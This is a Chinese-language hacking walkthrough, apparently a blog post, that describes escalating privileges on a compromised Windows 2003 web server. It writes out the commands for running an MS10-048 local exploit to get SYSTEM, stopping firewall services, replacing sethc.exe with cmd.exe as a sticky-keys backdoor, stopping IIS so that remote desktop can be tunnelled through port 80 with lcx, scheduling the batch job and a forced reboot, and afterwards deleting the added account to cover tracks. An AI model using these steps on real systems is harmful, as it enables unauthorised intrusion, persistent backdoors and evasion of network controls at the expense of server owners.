突破ACL表过滤进行提权

　　一日从朋友处得到一网站权限，让我帮忙提权。拿到后看了看，C、D盘有只读权限，C:\DocumentsandSettings\AllUsers\Documents可写。没有装FTP软件和数据库。wscript.shell没有被禁用，终端端口被改成45678。试了试从外网连不上45678端口，用LCX也导不出来，本以为是WINDOWS自带的防火墙或者IPSEC。不过防火墙的事拿到系统权限了再搞吧。
　　找了找本地溢出的漏洞，貌似只有MS08067和MS10048，不过在服务器的D盘根目录发现个KB958644.exe，这个应该是MS08067的补丁，把MS10048.exe传到C:\DocumentsandSettings\AllUsers\Documents目录里，运行ms10048Whoami,返回ntauthority\system，为系统权限。接下来关掉防火墙执行netstoppolicyagent和netstopsharedaccess.发现45678端口还是连不上，郁闷至极，ping外网IP也不通。执行一下tracert220.181.6.175(220.181.6.175是百度的IP)返回
　　11ms<1ms<1203.171.236.1
　　2***Requesttimedout.
　　3***Requesttimedout.
　　数据包经过路由器就被抛弃了.
　　初步判断是路由器设置了ACL表。
　　扫描了一下目标服务器，只开了80端口，服务器操作系统是WINDOWS2003.端口复用在2003上不管用。看来只有把IIS停了再把45678端口转到80端口上了。
　　在c:\windows目录中写了个1.bat
　　内容是
　　copyc:\windows\system32\cmd.exec:\windows\system32\sethc.exe/y/*替换sethc.exe，登陆上终端后按5下Shift打开CMD窗口*/
　　netstopw3svc
　　lcx.exe-tran80127.0.0.145678
　　netstartw3svc/*这一行是为了当lcx意外崩溃后启动IIS。*/
　　不过需要注意的是这个1.bat不能直接用ms10048.exe运行，因为IIS进程是ms10048.exe的父进程，把IIS结束后ms10048.exe也就自动退出了所以不会运行后面的代码
　　运行time/t得到服务器的时间是20:23。ms10048.exeat20:25c:\windows\1.bat让服务器在20:25运行1.bat为了保险起见再运行一个ms10048.exeat20:40shutdown-r让服务器在20：40重启。
　　一两分钟后用远程桌面连接服务器80端口成功连上，按无暇5下SHIFT键弹出CMD窗口添加用户成功登陆。登陆后运行at\delete\y删除刚才添加的定时重启任务。
　　接下来就该干什么干什么去了。
　　退出的时候可以直接重启服务器，不过这样不太厚道。打开一个cmd窗口运行queryuser找到自己的用户ID，我的用户ID是2、然后在CMD窗口里输入taskkill/IMlcx.exe/F&logoff2&netuser410502/del&netstartw3svc这行命令的意思是结束lcx.exe注销我的用户删掉我的用户然后启动IIS.提权到此顺利结束